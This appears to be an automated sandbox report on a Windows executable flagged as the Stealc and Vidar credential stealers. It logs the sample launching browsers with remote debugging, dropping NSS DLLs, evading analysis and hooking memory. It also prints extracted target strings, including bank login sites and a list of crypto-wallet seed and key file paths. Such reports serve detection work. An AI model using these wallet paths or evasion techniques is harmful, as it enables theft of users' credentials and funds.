Source: C:\Users\user\Desktop\gYjK72gL17.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2324,i,1475862429204762952,15165259420851730460,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2320,i,3391580961989094564,10660087592265685708,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2188,i,279746520434431833,257325066205650014,262144 /prefetch:3 Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: gYjK72gL17.exe Static file information: File size 5820392 > 1048576
Source: gYjK72gL17.exe Static PE information: Raw size of .vmp is bigger than: 0x100000 < 0x497400
Source: gYjK72gL17.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: gYjK72gL17.exe, 00000000.00000002.2613874448.000000006C9FD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: gYjK72gL17.exe, 00000000.00000002.2613874448.000000006C9FD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C983480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C983480
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .vmp
PE file contains sections with non-standard names
Source: gYjK72gL17.exe Static PE information: section name: .vmp
Source: gYjK72gL17.exe Static PE information: section name: .vmp
Source: gYjK72gL17.exe Static PE information: section name: .vmp
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9BB536 push ecx; ret 0_2_6C9BB549
Drops PE files
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Monitors registry run keys for changes
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Desktop\gYjK72gL17.exe Memory written: PID: 4512 base: 13D0005 value: E9 8B 2F FB 75 Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Memory written: PID: 4512 base: 77382F90 value: E9 7A D0 04 8A Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C9E55F0

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 82F5DE
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 8A2DB1
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 84B092
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 8AE047
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 70B67D
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 6C0247
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 79AFB6
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: B197D0
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 7301DA
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 72E8D0
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 84AC9A
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 755B20
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\gYjK72gL17.exe API coverage: 0.8 %
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C99C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C99C930
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: DBKFHCFB.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: DBKFHCFB.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: DBKFHCFB.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: DBKFHCFB.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: gYjK72gL17.exe, 00000000.00000003.2442011468.0000000001586000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: DBKFHCFB.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: DBKFHCFB.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: DBKFHCFB.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: DBKFHCFB.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: DBKFHCFB.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001551000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: DBKFHCFB.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: DBKFHCFB.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: DBKFHCFB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001527000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: DBKFHCFB.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: DBKFHCFB.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: DBKFHCFB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: DBKFHCFB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\gYjK72gL17.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C9E5FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C983480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C983480
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C9BB66C
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C9BB1F7
Source: C:\Users\user\Desktop\gYjK72gL17.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: gYjK72gL17.exe PID: 4512, type: MEMORYSTR
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9BB341 cpuid 0_2_6C9BB341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\gYjK72gL17.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\gYjK72gL17.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9835A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C9835A0

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.gYjK72gL17.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2607101722.0000000001527000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2605576671.00000000001EB000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gYjK72gL17.exe PID: 4512, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: gYjK72gL17.exe PID: 4512, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: Electrum
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: \Electrum\wallets\
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Liberty
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local 